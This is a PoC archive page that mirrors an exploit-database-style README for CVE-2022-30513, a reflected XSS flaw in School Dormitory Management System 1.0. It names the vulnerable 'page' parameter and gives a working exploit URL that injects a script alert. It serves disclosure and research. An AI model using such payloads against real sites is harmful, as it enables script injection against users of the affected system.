CVE-2022-30513 PoC — School Dormitory Management System 跨站脚本漏洞

Source

https://github.com/bigzooooz/CVE-2022-30513

Associated Vulnerability

Title:School Dormitory Management System 跨站脚本漏洞 (CVE-2022-30513)
Description:School Dormitory Management System是Carlo Montero个人开发者的一个学校宿舍管理系统。 School Dormitory Management System 1.0 存在安全漏洞，该漏洞源于 admin/inc/navigation.php:125 页面存在跨站脚本问题。

Description

School Dormitory Management System 1.0 - Reflected XSS

Readme

# CVE-2022-30513

School Dormitory Management System 1.0 - Reflected XSS

#### Exploit Title: School Dormitory Management System 1.0 - Reflected XSS
#### Date: 2022-05-25
#### CVE: CVE-2022-30513
#### Exploit Author: Abdulaziz Saad (@b4zb0z)
#### Vendor Homepage: https://www.sourcecodester.com/
#### Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html
#### Version: 1.0
#### Tested on: LAMP, Ubuntu

-----


#### [#] Vulnerability Location:

  `$_GET['page']` in `/dms/admin/inc/navigation.php:125`

----

#### [#] Exploitation :

  `http://localhost/dms/admin/?page=%27;%20alert(%22b4zb0z%22);%20s=%27`

File Snapshot


 [4.0K]  /data/pocs/5812312114fe84cb292bf1296a51fa335603f63b
└── [ 673]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!